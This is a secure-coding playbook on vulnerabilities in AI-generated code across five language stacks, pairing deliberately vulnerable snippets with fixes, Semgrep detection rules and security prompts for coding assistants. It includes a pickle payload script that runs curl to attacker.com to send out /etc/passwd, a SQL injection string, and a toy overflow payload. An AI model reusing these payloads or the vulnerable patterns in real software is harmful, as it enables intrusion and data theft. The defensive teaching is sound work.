WWW.DEVSECOPSGUIDES.
COM
Vibe coding has transformed software development by democratizing programming through AI-assisted tools like GitHub Copilot, Cursor,
Windsurf, and Claude Code. However, this "forget that the code even exists" mentality has created a new category of systematically
vulnerable applications.
This playbook examines multi-technology attack scenarios where vibe coding misunderstandings create exploitable vulnerabilities across
.NET/ASP.NET Core, C/C++, Java/Spring, JavaScript, and Python ecosystems. We provide defensive strategies, AI assistant rules files,
and detection patterns to transform vibe coding from a security liability into a secure-by-default development accelerator.
Aspect Insecure Vibe Coding Secure Vibe Coding
Prompt Engineering Generic requests without security context Security-aware prompts with CWE references
Code Review Process Auto-merge AI-generated code Multi-stage validation with security scanning
Technology Integration Isolated per-language development Cross-stack security consistency
Validation Pipeline Manual testing only Automated SAST, SCA, and secret detection
Incident Response Reactive patching per technology Proactive multi-stack vulnerability management
Developer Training AI tool proficiency only Security-aware vibe coding practices
Attack Scenario: Vibe-coded controllers missing [Authorize] attributes expose administrative functions to unauthenticated users.
// AI-generated vulnerable controller - missing authorization
[ApiController]
[Route("api/[controller]")]
public class AdminController : ControllerBase
{
private readonly IUserService _userService;
public AdminController(IUserService userService)
{
_userService = userService;
}
// VULNERABILITY: No [Authorize] attribute
[HttpGet("users/export")]
public async Task<IActionResult> ExportAllUsers()
{
var users = await _userService.GetAllUsersWithSensitiveDataAsync();
return Ok(users); // Exposes PII to anyone
}
// VULNERABILITY: No role-based authorization
[HttpPost("users/{id}/promote")]
public async Task<IActionResult> PromoteToAdmin(int id)
{
await _userService.GrantAdminRoleAsync(id);
return Ok("User promoted to admin");
}
}
1 / 55
Attacker .NET API Database
GET /api/admin/users/export
No [Authorize] check
SELECT * FROM Users
All user PII data
Sensitive data exposed
POST /api/admin/users/123/promote
No role validation
UPDATE Users SET Role='Admin'
Role updated
"User promoted to admin"
Attacker .NET API Database
Visual Attack Flow:
// Security-aware AI-generated controller
[ApiController]
[Route("api/[controller]")]
[Authorize(Roles = "Administrator")] // Global authorization requirement
public class AdminController : ControllerBase
{ 2 / 55
private readonly IUserService _userService;
private readonly IAuthorizationService _authorizationService;
public AdminController(IUserService userService, IAuthorizationService authorizationService)
{
_userService = userService;
_authorizationService = authorizationService;
}
[HttpGet("users/export")]
public async Task<IActionResult> ExportAllUsers()
{
// Additional authorization check for sensitive data
var authResult = await _authorizationService.AuthorizeAsync(User, "DataExportPolicy");
if (!authResult.Succeeded)
{
return Forbid("Insufficient privileges for data export");
}
var users = await _userService.GetUsersForExportAsync(); // Returns sanitized data
return Ok(users);
}
[HttpPost("users/{id}/promote")]
public async Task<IActionResult> PromoteToAdmin(int id)
{
// Verify super admin role for privilege escalation
if (!User.IsInRole("SuperAdministrator"))
{
return Forbid("Only super administrators can promote users");
}
await _userService.GrantAdminRoleAsync(id);
return Ok("User promoted with proper authorization");
}
}
Visual Defense Architecture:
rules:
3 / 55
- id: missing-authorize-attribute
pattern: |
[ApiController]
...
public class $CLASS : ControllerBase
{
...
[Http$METHOD("...")]
public ... $ACTION(...)
{
...
}
}
pattern-not: |
[Authorize]
...
[Http$METHOD("...")]
public ... $ACTION(...)
message: "Controller action missing [Authorize] attribute - potential unauthorized access"
severity: ERROR
languages: [csharp]
You are a security-focused .NET/ASP.NET Core developer. Generate code that:
- Always applies [Authorize] attributes to controllers unless explicitly documented with [AllowAnonymous]
- Uses IAuthorizationService for complex authorization logic
- Implements proper input validation using Data Annotations or FluentValidation
- Stores secrets in Azure Key Vault or user secrets during development
- Uses Entity Framework with parameterized queries, never string concatenation
- Includes comprehensive error handling without information disclosure
- Applies the principle of least privilege to all data access operations
Focus on OWASP ASVS Level 2 compliance for authentication and authorization controls.
Attack Scenario: AI-generated Spring Data JPA repositories using string concatenation in @Query annotations enable SQL injection attacks.
// AI-generated vulnerable repository
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
// VULNERABILITY: String concatenation in @Query
@Query("SELECT u FROM User u WHERE u.username = '" + "#{username}" + "' AND u.status = 'ACTIVE'")
User findActiveUserByUsername(@Param("username") String username);
// VULNERABILITY: Dynamic query building
@Query("SELECT u FROM User u WHERE u.email LIKE '%" + "#{email}" + "%'")
List<User> findUsersByEmailPattern(@Param("email") String email);
// VULNERABILITY: No input validation
@Modifying
@Query("UPDATE User u SET u.role = '" + "#{role}" + "' WHERE u.id = #{userId}")
void updateUserRole(@Param("userId") Long userId, @Param("role") String role);
}
4 / 55
Reconnaissance
Identify injection point
PayloadCrafting
username=' OR '1'='1
Exploitation
Extract admin credentials
PrivilegeEscalation
Access sensitive tables
DataExfiltration
Mission complete
Visual Attack Flow:
// Security-aware Spring Data JPA repository
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
// SECURE: Parameterized query with proper binding
@Query("SELECT u FROM User u WHERE u.username = :username AND u.status = 'ACTIVE'")
User findActiveUserByUsername(@Param("username") String username);
// SECURE: Using Spring Data method naming convention
List<User> findByEmailContainingAndStatusIs(String email, String status);
// SECURE: Parameterized update with validation
@Modifying
@Query("UPDATE User u SET u.role = :role WHERE u.id = :userId")
@Transactional 5 / 55
void updateUserRole(@Param("userId") Long userId, @Param("role") @Valid String role);
// SECURE: Custom method with validation
@Query("SELECT u FROM User u WHERE u.departmentId = :deptId ORDER BY u.createdAt DESC")
Page<User> findUsersByDepartment(@Param("deptId") Long departmentId, Pageable pageable);
}
Visual Defense Architecture:
rules:
- id: sql-injection-spring-query
pattern: |
@Query("... + $PARAM + ...")
message: "Potential SQL injection: avoid string concatenation in @Query annotations"
severity: ERROR
languages: [java]
fix: |
@Query("SELECT u FROM User u WHERE u.field = :paramName")
// Use :paramName instead of string concatenation
You are a security-aware Java/Spring Boot developer. Generate code that:
- Uses parameterized queries with :paramName syntax in @Query annotations
- Implements Bean Validation (@Valid, @NotNull) on all request DTOs
- Uses Spring Data JPA method naming conventions when possible
- Applies @PreAuthorize or @Secured annotations on service methods
- Configures proper CORS with specific origins, never wildcard
- Uses @Transactional with appropriate isolation levels
- Validates all user inputs before database operations
- Applies OWASP Java security best practices throughout
Never use string concatenation in database queries or dynamic query building.
Attack Scenario: AI-generated Node.js services using eval() or template literals in child_process.exec() enable command injection.
// AI-generated vulnerable service
const express = require('express');
const { exec } = require('child_process');
const app = express();
app.use(express.json());
// VULNERABILITY: Direct eval() usage
app.post('/api/calculate', (req, res) => { 6 / 55
const { expression } = req.body;
try {
// DANGEROUS: Direct evaluation of user input
const result = eval(expression);
res.json({ result });
} catch (error) {
res.status(400).json({ error: 'Invalid expression' });
}
});
// VULNERABILITY: Template literal in shell command
app.post('/api/process-file', (req, res) => {
const { filename, operation } = req.body;
// DANGEROUS: User input directly in shell command
exec(`${operation} /uploads/${filename}`, (error, stdout, stderr) => {
if (error) {
return res.status(500).json({ error: error.message });
}
res.json({ output: stdout });
});
});
// VULNERABILITY: Unsafe file operations
app.get('/api/read-config/:configName', (req, res) => {
const { configName } = req.params;
const fs = require('fs');
// DANGEROUS: Path traversal vulnerability
fs.readFile(`/config/${configName}.json`, 'utf8', (err, data) => {
if (err) {
return res.status(404).json({ error: 'Config not found' });
}
res.json(JSON.parse(data));
});
});
Error parsing Mermaid diagram!
Parse error on line 13:
...cat /etc/passwd; rm" API->>OS: Shell
-----------------------^
Expecting 'SOLID_OPEN_ARROW', 'DOTTED_OPEN_ARROW', 'SOLID_ARROW', 'BIDIRECTIONAL_SOLID_ARROW', 'DOTTED_ARROW',
'BIDIRECTIONAL_DOTTED_ARROW', 'SOLID_CROSS', 'DOTTED_CROSS', 'SOLID_POINT', 'DOTTED_POINT', got 'NEWLINE'
Visual Attack Flow:
7 / 55
// Security-aware Node.js service
const express = require('express');
const { spawn } = require('child_process');
const path = require('path');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const validator = require('validator');
const app = express();
// Security middleware
app.use(helmet());
app.use(express.json({ limit: '10mb' }));
// Rate limiting
const limiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100 // limit each IP to 100 requests per windowMs
});
app.use(limiter);
// SECURE: Mathematical expression evaluation without eval()
app.post('/api/calculate', (req, res) => {
const { expression } = req.body;
// Input validation
if (!expression || typeof expression !== 'string') {
return res.status(400).json({ error: 'Invalid expression format' });
}
// Whitelist mathematical operations only
const mathPattern = /^[0-9+\-*/.() ]+$/;
if (!mathPattern.test(expression)) {
return res.status(400).json({ error: 'Only mathematical operations allowed' });
}
try {
// SAFE: Use Function constructor with restricted context
const func = new Function('return ' + expression);
const result = func();
res.json({ result });
} catch (error) {
res.status(400).json({ error: 'Invalid mathematical expression' });
}
});
8 / 55
// SECURE: Safe command execution with argument arrays
app.post('/api/process-file', (req, res) => {
const { filename, operation } = req.body;
// Input validation and sanitization
if (!validator.isAlphanumeric(filename.replace(/[._-]/g, ''))) {
return res.status(400).json({ error: 'Invalid filename format' });
}
// Whitelist allowed operations
const allowedOperations = ['analyze', 'convert', 'validate'];
if (!allowedOperations.includes(operation)) {
return res.status(400).json({ error: 'Operation not allowed' });
}
// SAFE: Use spawn with argument array, not template literals
const child = spawn('file-processor', [operation, filename], {
cwd: '/safe-workspace',
timeout: 30000
});
let output = '';
child.stdout.on('data', (data) => {
output += data.toString();
});
child.on('close', (code) => {
if (code === 0) {
res.json({ output: output.trim() });
} else {
res.status(500).json({ error: 'Processing failed' });
}
});
});
// SECURE: Path traversal protection
app.get('/api/read-config/:configName', (req, res) => {
const { configName } = req.params;
// Input validation
if (!validator.isAlphanumeric(configName)) {
return res.status(400).json({ error: 'Invalid config name' });
}
// SAFE: Resolve path and validate it's within allowed directory
const configDir = '/app/config';
const configPath = path.join(configDir, `${configName}.json`);
const resolvedPath = path.resolve(configPath);
if (!resolvedPath.startsWith(path.resolve(configDir))) {
return res.status(403).json({ error: 'Access denied' });
}
const fs = require('fs').promises;
fs.readFile(resolvedPath, 'utf8')
.then(data => {
const config = JSON.parse(data);
res.json(config);
})
.catch(err => {
res.status(404).json({ error: 'Config not found' });
});
}); 9 / 55
Visual Defense Architecture:
rules:
- id: command-injection-eval
pattern: eval($INPUT)
message: "Dangerous eval() usage - potential code injection"
severity: ERROR
languages: [javascript, typescript]
- id: command-injection-exec
pattern: |
exec(`...${$VAR}...`)
message: "Template literal in exec() - potential command injection"
severity: ERROR
languages: [javascript, typescript]
You are a security-conscious Node.js/Express developer. Generate code that:
- Uses child_process.spawn with argument arrays, never template literals in exec()
- Implements Helmet.js for security headers and proper CORS configuration
- Validates all user input with joi, express-validator, or validator.js
- Uses parameterized queries with prepared statements for database operations
- Applies rate limiting and request size limits
- Implements proper path traversal protection using path.resolve()
- Never uses eval() or Function() constructor with user input
- Includes comprehensive error handling without information disclosure
- Follows OWASP Node.js security best practices
Focus on preventing injection attacks and implementing defense in depth.
Attack Scenario: AI-generated Python applications using pickle.loads() on user-provided data enable remote code execution.
# AI-generated vulnerable Flask application
from flask import Flask, request, session, jsonify
import pickle
import base64
import os
app = Flask(__name__)
app.secret_key = 'hardcoded-secret-key' # VULNERABILITY: Hardcoded secret
@app.route('/api/save-preferences', methods=['POST'])
def save_preferences():
preferences = request.json.get('preferences') 10 / 55
# VULNERABILITY: Pickle serialization of user data
serialized = base64.b64encode(pickle.dumps(preferences))
session['user_prefs'] = serialized.decode()
return jsonify({'message': 'Preferences saved successfully'})
@app.route('/api/load-preferences', methods=['GET'])
def load_preferences():
serialized_prefs = session.get('user_prefs')
if not serialized_prefs:
return jsonify({'preferences': {}})
# VULNERABILITY: Pickle deserialization of user-controlled data
try:
decoded = base64.b64decode(serialized_prefs)
preferences = pickle.loads(decoded) # DANGEROUS!
return jsonify({'preferences': preferences})
except Exception as e:
return jsonify({'error': 'Failed to load preferences'}), 500
@app.route('/api/backup-data', methods=['POST'])
def backup_data():
backup_path = request.json.get('backup_path', '/tmp/backup.pkl')
# VULNERABILITY: Unsafe file path handling
user_data = get_user_data()
# DANGEROUS: User-controlled file path + pickle
with open(backup_path, 'wb') as f:
pickle.dump(user_data, f)
return jsonify({'message': f'Data backed up to {backup_path}'})
def get_user_data():
return {'users': ['admin', 'guest'], 'settings': {'debug': True}}
# Attacker's payload generation script
import pickle
import base64
import os
class MaliciousPayload:
def __reduce__(self):
# This will execute when unpickled
return (os.system, ('curl http://attacker.com/exfiltrate?data=$(cat /etc/passwd | base64)',))
# Generate malicious payload
payload = MaliciousPayload()
serialized = base64.b64encode(pickle.dumps(payload))
print(f"Malicious payload: {serialized.decode()}")
11 / 55
PayloadGeneration
Create malicious object
Serialization
Base64 encode
Transmission
Send to /api/save-
preferences
Deserialization
pickle.loads() triggers
reduce
CodeExecution
os.system() execution
SystemCompromise
RCE complete
Visual Attack Flow:
# Security-aware Flask application
from flask import Flask, request, session, jsonify
import json
import secrets
import os
from pathlib import Path
from marshmallow import Schema, fields, ValidationError
import jwt
from datetime import datetime, timedelta
app = Flask(__name__)
app.secret_key = os.environ.get('FLASK_SECRET_KEY', secrets.token_hex(32))
12 / 55
# Input validation schemas
class PreferencesSchema(Schema):
theme = fields.Str(validate=lambda x: x in ['light', 'dark'])
language = fields.Str(validate=lambda x: x in ['en', 'es', 'fr', 'de'])
notifications = fields.Bool()
class BackupSchema(Schema):
backup_name = fields.Str(required=True, validate=lambda x: x.isalnum())
preferences_schema = PreferencesSchema()
backup_schema = BackupSchema()
@app.route('/api/save-preferences', methods=['POST'])
def save_preferences():
try:
# SECURE: JSON validation instead of pickle
preferences = preferences_schema.load(request.json.get('preferences', {}))
# SECURE: Use JWT for session data
token_data = {
'preferences': preferences,
'exp': datetime.utcnow() + timedelta(hours=24),
'iat': datetime.utcnow()
}
token = jwt.encode(token_data, app.secret_key, algorithm='HS256')
session['user_prefs_token'] = token
return jsonify({'message': 'Preferences saved securely'})
except ValidationError as e:
return jsonify({'error': 'Invalid preferences format', 'details': e.messages}), 400
@app.route('/api/load-preferences', methods=['GET'])
def load_preferences():
token = session.get('user_prefs_token')
if not token:
return jsonify({'preferences': {}})
try:
# SECURE: JWT verification and decoding
decoded = jwt.decode(token, app.secret_key, algorithms=['HS256'])
return jsonify({'preferences': decoded.get('preferences', {})})
except jwt.ExpiredSignatureError:
return jsonify({'error': 'Session expired'}), 401
except jwt.InvalidTokenError:
return jsonify({'error': 'Invalid session'}), 401
@app.route('/api/backup-data', methods=['POST'])
def backup_data():
try:
# SECURE: Input validation
validated_data = backup_schema.load(request.json)
backup_name = validated_data['backup_name']
# SECURE: Controlled backup directory
backup_dir = Path('/app/backups')
backup_dir.mkdir(exist_ok=True)
# SECURE: Construct safe file path
13 / 55
backup_file = backup_dir / f"{backup_name}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
# Ensure path is within allowed directory
if not str(backup_file.resolve()).startswith(str(backup_dir.resolve())):
return jsonify({'error': 'Invalid backup path'}), 400
user_data = get_user_data()
# SECURE: JSON serialization instead of pickle
with open(backup_file, 'w') as f:
json.dump(user_data, f, indent=2, default=str)
return jsonify({'message': f'Data backed up securely to {backup_file.name}'})
except ValidationError as e:
return jsonify({'error': 'Invalid backup request', 'details': e.messages}), 400
except Exception as e:
return jsonify({'error': 'Backup failed'}), 500
def get_user_data():
return {
'users': ['admin', 'guest'],
'settings': {'debug': False},
'timestamp': datetime.utcnow().isoformat()
}
Visual Defense Architecture:
rules:
- id: unsafe-pickle-loads
pattern: pickle.loads($DATA)
message: "Unsafe pickle.loads() - use JSON or safer serialization"
severity: ERROR
languages: [python]
- id: hardcoded-secret-key
pattern: |
secret_key = '$KEY'
message: "Hardcoded secret key detected - use environment variables"
severity: HIGH
languages: [python]
You are a security-focused Python developer. Generate code that:
- Uses JSON or JWT for data serialization, never pickle for user data
- Implements comprehensive input validation with marshmallow or pydantic schemas
- Uses secrets module for cryptographic operations and key generation
- Stores sensitive configuration in environment variables, never hardcoded
- Implements SQLAlchemy ORM with parameterized queries for database operations
- Uses Flask-Login or Django authentication decorators for14access
/ 55 control
- Applies proper path validation to prevent directory traversal
- Includes comprehensive error handling without information disclosure
- Follows OWASP Python security guidelines
Never use pickle.loads(), eval(), or exec() with user-controlled data.
Attack Scenario: AI-generated C/C++ code using unsafe string functions like strcpy() , gets() , and sprintf() enables buffer overflow
attacks.
// AI-generated vulnerable C++ service
#include <iostream>
#include <cstring>
#include <cstdio>
#include <unistd.h>
class UserProcessor {
private:
char username[64];
char buffer[256];
bool isAdmin;
public:
UserProcessor() : isAdmin(false) {}
// VULNERABILITY: Unsafe strcpy without bounds checking
void setUsername(const char* name) {
strcpy(username, name); // DANGEROUS: No length validation
std::cout << "Username set to: " << username << std::endl;
}
// VULNERABILITY: gets() is inherently unsafe
void processUserInput() {
char input[128];
std::cout << "Enter command: ";
gets(input); // DANGEROUS: No bounds checking
executeCommand(input);
}
// VULNERABILITY: sprintf without bounds checking
void formatMessage(const char* template_str, const char* data) {
char formatted[256];
sprintf(formatted, template_str, data); // DANGEROUS: Format string vulnerability
std::cout << "Formatted: " << formatted << std::endl;
}
// VULNERABILITY: Manual memory management without validation
void processData(const char* data, int length) {
char* processing_buffer = new char[256];
// DANGEROUS: No length validation before copy
memcpy(processing_buffer, data, length);
// Process data...
std::cout << "Processing: " << processing_buffer << std::endl;
delete[] processing_buffer;
}
private:
void executeCommand(const char* cmd) {
15 / 55
if (isAdmin) {
system(cmd); // Additional vulnerability: command injection
} else {
std::cout << "Access denied" << std::endl;
}
}
};
// VULNERABILITY: Main function without input validation
int main() {
UserProcessor processor;
char name_buffer[1024]; // Large buffer to receive malicious input
std::cout << "Enter username: ";
std::cin.getline(name_buffer, sizeof(name_buffer));
processor.setUsername(name_buffer); // Overflow can occur here
processor.processUserInput();
return 0;
}
// Attacker's exploit development
#include <iostream>
#include <cstring>
int main() {
// Generate buffer overflow payload
char exploit_payload[1024];
// Fill buffer with pattern to overwrite adjacent memory
memset(exploit_payload, 'A', 64); // Fill username buffer
// Overwrite isAdmin boolean (adjacent in memory)
exploit_payload[64] = 1; // Set isAdmin = true
// Add shellcode or return address manipulation
strcpy(&exploit_payload[65], "\x90\x90\x90\x90"); // NOP sled
// Null terminate for string functions
exploit_payload[1023] = '\0';
std::cout << "Malicious payload generated: " << strlen(exploit_payload) << " bytes" << std::endl;
return 0;
}
16 / 55
Attacker C++ Application Memory Layout Operating System
Send oversized username
strcpy() without bounds check
Buffer overflow occurs
Adjacent variables overwritten
isAdmin flag corrupted
Send malicious command
system() call with elevated privileges
Command executed with privileges
Attacker C++ Application Memory Layout Operating System
Visual Attack Flow:
// Security-aware C++ implementation
#include <iostream>
#include <string>
#include <memory>
#include <vector>
#include <algorithm>
#include <cstdio>
#include <unistd.h>
class SecureUserProcessor {
private:
std::string username; // SECURE: Use std::string instead of char arrays
bool isAdmin;
static const size_t MAX_USERNAME_LENGTH = 64;
static const size_t MAX_COMMAND_LENGTH = 256;
public:
SecureUserProcessor() : isAdmin(false) {}
// SECURE: Length validation and safe string operations
bool setUsername(const std::string& name) {
17 / 55
if (name.length() > MAX_USERNAME_LENGTH) {
std::cerr << "Username too long (max " << MAX_USERNAME_LENGTH << " characters)" << std::endl;
return false;
}
// SECURE: Input sanitization
std::string sanitized = sanitizeInput(name);
if (sanitized.empty()) {
std::cerr << "Username contains invalid characters" << std::endl;
return false;
}
username = sanitized;
std::cout << "Username safely set to: " << username << std::endl;
return true;
}
// SECURE: Safe input handling with bounds checking
bool processUserInput() {
std::string input;
std::cout << "Enter command (max " << MAX_COMMAND_LENGTH << " chars): ";
// SECURE: Use std::getline with length limit
if (!std::getline(std::cin, input) || input.length() > MAX_COMMAND_LENGTH) {
std::cerr << "Invalid input or command too long" << std::endl;
return false;
}
return executeCommand(input);
}
// SECURE: Safe string formatting with bounds checking
bool formatMessage(const std::string& template_str, const std::string& data) {
try {
// SECURE: Use C++ string formatting or snprintf for bounds checking
std::string formatted;
// Simple template replacement (in production, use a proper template engine)
formatted = template_str;
size_t pos = formatted.find("%s");
if (pos != std::string::npos) {
formatted.replace(pos, 2, data);
}
std::cout << "Safely formatted: " << formatted << std::endl;
return true;
} catch (const std::exception& e) {
std::cerr << "Formatting error: " << e.what() << std::endl;
return false;
}
}
// SECURE: RAII memory management with bounds checking
bool processData(const std::vector<char>& data) {
if (data.empty() || data.size() > 1024) { // Reasonable size limit
std::cerr << "Invalid data size" << std::endl;
return false;
}
// SECURE: Use smart pointers and containers
auto processing_buffer = std::make_unique<std::vector<char>>(data.size());
// SECURE: Safe copy with bounds checking
std::copy(data.begin(), data.end(), processing_buffer->begin());
18 / 55
std::cout << "Safely processing " << processing_buffer->size() << " bytes" << std::endl;
// Memory automatically cleaned up by smart pointer
return true;
}
private:
// SECURE: Input sanitization
std::string sanitizeInput(const std::string& input) {
std::string result;
for (char c : input) {
// Allow alphanumeric, spaces, and common safe punctuation
if (std::isalnum(c) || c == ' ' || c == '-' || c == '_' || c == '.') {
result += c;
}
}
return result;
}
// SECURE: Command validation instead of direct execution
bool executeCommand(const std::string& cmd) {
if (!isAdmin) {
std::cout << "Access denied - insufficient privileges" << std::endl;
return false;
}
// SECURE: Whitelist allowed commands
const std::vector<std::string> allowed_commands = {
"status", "help", "version", "info"
};
if (std::find(allowed_commands.begin(), allowed_commands.end(), cmd) == allowed_commands.end()) {
std::cout << "Command not allowed: " << cmd << std::endl;
return false;
}
std::cout << "Executing safe command: " << cmd << std::endl;
// Execute safe internal function instead of system()
handleSafeCommand(cmd);
return true;
}
void handleSafeCommand(const std::string& cmd) {
if (cmd == "status") {
std::cout << "System status: OK" << std::endl;
} else if (cmd == "help") {
std::cout << "Available commands: status, help, version, info" << std::endl;
} else if (cmd == "version") {
std::cout << "Version: 1.0.0-secure" << std::endl;
} else if (cmd == "info") {
std::cout << "User: " << username << ", Admin: " << (isAdmin ? "Yes" : "No") << std::endl;
}
}
};
// SECURE: Main function with proper error handling
int main() {
SecureUserProcessor processor;
std::cout << "Secure User Processor v1.0" << std::endl;
std::cout << "Enter username: ";
19 / 55
std::string username;
if (!std::getline(std::cin, username)) {
std::cerr << "Failed to read username" << std::endl;
return 1;
}
if (!processor.setUsername(username)) {
std::cerr << "Failed to set username" << std::endl;
return 1;
}
if (!processor.processUserInput()) {
std::cerr << "Failed to process user input" << std::endl;
return 1;
}
return 0;
}
User Input
Length Check
Too Long Valid Length
Reject Input Character Validation
Invalid Chars Valid Chars
Sanitize/Reject Buffer Allocation
Safe Copy Operation
Process Data
Automatic Cleanup
20 / 55
Visual Defense Architecture:
rules:
- id: unsafe-string-functions
patterns:
- pattern: strcpy($DEST, $SRC)
- pattern: gets($BUF)
- pattern: sprintf($BUF, ...)
message: "Unsafe string function - use safe alternatives"
severity: ERROR
languages: [c, cpp]
fix: |
// Use safe alternatives:
strncpy_s(dest, dest_size, src, _TRUNCATE); // Instead of strcpy
fgets(buffer, sizeof(buffer), stdin); // Instead of gets
snprintf(buffer, sizeof(buffer), fmt, ...); // Instead of sprintf
You are a security-focused C/C++ systems developer. Generate code that:
- Uses safe string functions: strncpy_s instead of strcpy, snprintf instead of sprintf
- Never uses gets(), strcpy(), or sprintf() - always use bounded alternatives
- Implements RAII patterns with smart pointers (std::unique_ptr, std::shared_ptr)
- Uses std::string and std::vector instead of raw char arrays when possible
- Performs bounds checking on all buffer operations and memory allocations
- Enables compiler security flags: -fstack-protector-strong, -D_FORTIFY_SOURCE=2
- Implements comprehensive input validation and sanitization
- Uses static_cast instead of C-style casts for type safety
- Includes proper error handling and resource cleanup
- Applies defense-in-depth principles with multiple validation layers
Follow modern C++ best practices for memory safety and OWASP C++ guidelines.
To prevent vibe coding vulnerabilities across all technology stacks, we provide comprehensive rules files for major AI coding assistants. Each
rules file incorporates OWASP security principles, CWE-based vulnerability prevention, and technology-specific secure coding practices.
All AI assistant rules files include this foundational security guidance:
# Universal Security Baseline for AI Code Generation
## Core Security Principles
21 / 55
- **Defense in Depth**: Implement multiple layers of security controls
- **Principle of Least Privilege**: Grant minimal necessary permissions
- **Secure by Default**: Choose secure configurations over convenient ones
- **Input Validation**: Validate all user input at system boundaries
- **Error Handling**: Prevent information disclosure through error messages
## Critical CWE Prevention
- **CWE-89**: SQL Injection - Use parameterized queries and ORM frameworks
- **CWE-78**: OS Command Injection - Use safe command execution patterns
- **CWE-306**: Missing Authentication - Apply authentication to all sensitive operations
- **CWE-502**: Unsafe Deserialization - Use JSON/JWT instead of native serialization
- **CWE-120**: Buffer Overflow - Use memory-safe languages and bounds checking
# Cursor Security Rules for Multi-Stack Development
## Language-Agnostic Security Requirements
- Always validate and sanitize user input before processing
- Use parameterized queries for database operations across all languages
- Implement proper authentication and authorization checks
- Never hardcode secrets, credentials, or API keys in source code
- Apply the principle of least privilege to all access controls
## .NET/ASP.NET Core Specific Rules
- Apply [Authorize] attributes to all controller actions unless explicitly [AllowAnonymous]
- Use IConfiguration for secrets management, never hardcoded values
- Implement proper model validation with Data Annotations or FluentValidation
- Use Entity Framework with LINQ expressions, never raw SQL concatenation
- Enable HTTPS redirection and security headers in production
## Java/Spring Specific Rules
- Use @PreAuthorize or @Secured annotations on sensitive service methods
- Implement Bean Validation (@Valid, @NotNull) on all request DTOs
- Use Spring Data JPA with :paramName syntax in @Query annotations
- Configure CORS with specific origins, never use wildcard (*)
- Apply @Transactional with appropriate isolation levels
## JavaScript/Node.js Specific Rules
- Use child_process.spawn with argument arrays, never template literals in exec()
- Implement Helmet.js for security headers and proper CORS configuration
- Validate input with joi, express-validator, or similar validation libraries
- Use prepared statements for database queries, never string concatenation
- Apply rate limiting and request size limits to all endpoints
## Python Specific Rules
- Use JSON or JWT for session data, never pickle for user-controlled data
- Implement comprehensive input validation with marshmallow or pydantic
- Use SQLAlchemy ORM with parameter binding, never raw SQL formatting
- Store secrets in environment variables with python-dotenv or similar
- Apply Flask-Login or Django authentication decorators to protected views
## C/C++ Specific Rules
- Use safe string functions: strncpy_s, snprintf instead of strcpy, sprintf
- Implement RAII patterns with smart pointers (unique_ptr, shared_ptr)
- Perform bounds checking on all buffer operations and memory allocations
- Use std::string and std::vector instead of raw char arrays when possible
- Enable compiler security flags: -fstack-protector-strong, -D_FORTIFY_SOURCE=2
# Cline Security Configuration for Multi-Technology Projects
## Security-First Development Approach 22 / 55
You are a security-aware developer who prioritizes secure coding practices across all technology stacks. Apply defense-
in-depth principles and follow OWASP guidelines for all generated code.
## Cross-Technology Security Patterns
### Input Validation
- **All Languages**: Validate input length, type, format, and range before processing
- **Web Applications**: Sanitize HTML input to prevent XSS attacks
- **APIs**: Validate request payloads against strict schemas
- **Database**: Use parameterized queries or ORM frameworks exclusively
### Authentication & Authorization
- **.NET**: Implement [Authorize] attributes and policy-based authorization
- **Java**: Use Spring Security with @PreAuthorize annotations
- **Node.js**: Implement JWT-based authentication with proper validation
- **Python**: Use Flask-Login/Django auth with session protection
- **C++**: Implement secure authentication protocols with validated inputs
### Secure Data Handling
- **Serialization**: Use JSON, XML, or Protocol Buffers - never native serialization for user data
- **Secrets Management**: Store in environment variables, key vaults, or secure configuration
- **Database**: Use ORM frameworks with parameterized queries
- **File Operations**: Validate file paths and implement access controls
- **Network**: Use HTTPS/TLS for all data transmission
### Error Handling
- Log security events for monitoring and analysis
- Return generic error messages to users to prevent information disclosure
- Implement proper exception handling without exposing system internals
- Use structured logging with appropriate security filtering
## Technology-Specific Secure Patterns
### .NET/ASP.NET Core Secure Patterns
```csharp
// Secure controller pattern
[Authorize(Roles = "Admin")]
[ApiController]
[Route("api/[controller]")]
public class SecureController : ControllerBase
{
[HttpGet]
public async Task<IActionResult> Get([FromQuery] ValidatedRequestModel model)
{
// Secure implementation
}
}
// Secure service pattern
@Service
@Transactional
public class SecureService {
@PreAuthorize("hasRole('ADMIN')")
public ResponseEntity<DataModel> getSecureData(@Valid RequestModel request) {
// Secure implementation
}
}
// Secure Express route pattern 23 / 55
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
app.use(helmet());
app.use(rateLimit({ windowMs: 15 * 60 * 1000, max: 100 }));
app.post('/api/secure', validateInput, authenticateUser, (req, res) => {
// Secure implementation
});
# Secure Flask route pattern
from flask import Flask, request, jsonify
from flask_login import login_required
from marshmallow import Schema, fields
class RequestSchema(Schema):
data = fields.Str(required=True, validate=validate.Length(max=1000))
@app.route('/api/secure', methods=['POST'])
@login_required
def secure_endpoint():
# Secure implementation
// Secure C++ class pattern
class SecureProcessor {
private:
std::string validateInput(const std::string& input) {
// Input validation and sanitization
}
public:
bool processSecurely(const std::string& data) {
auto validated = validateInput(data);
// Secure processing with bounds checking
}
};
### 3. Claude CLAUDE.md Rules
```markdown
# CLAUDE.md - Security-Focused Development Rules
## Mission Statement
Generate secure, production-ready code across multiple technology stacks while maintaining security best practices and
preventing common vulnerabilities.
## Security Architecture Principles
### 1. Threat Modeling Integration
- Consider potential attack vectors for each code component
- Implement security controls proportional to risk level
- Apply STRIDE methodology (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of
Privilege)
- Document security assumptions and trust boundaries
### 2. Secure Development Lifecycle
- Security requirements gathering before code generation
24 / 55
- Secure design patterns and architectural decisions
- Security-focused code review and testing
- Vulnerability assessment and penetration testing considerations
## Technology Stack Security Requirements
### Web Application Security (.NET/Java/Node.js/Python)
- **Authentication**: Multi-factor authentication, secure session management
- **Authorization**: Role-based access control, attribute-based permissions
- **Input Validation**: Server-side validation, XSS prevention, SQL injection protection
- **Output Encoding**: Context-aware output encoding, CSP headers
- **Secure Communications**: HTTPS/TLS 1.3, certificate pinning, HSTS headers
### Systems Programming Security (C/C++)
- **Memory Safety**: Bounds checking, buffer overflow prevention, use-after-free protection
- **Secure Compilation**: Enable security flags, stack protection, ASLR
- **Input Validation**: Length validation, format string protection, integer overflow prevention
- **Privilege Management**: Principle of least privilege, secure privilege dropping
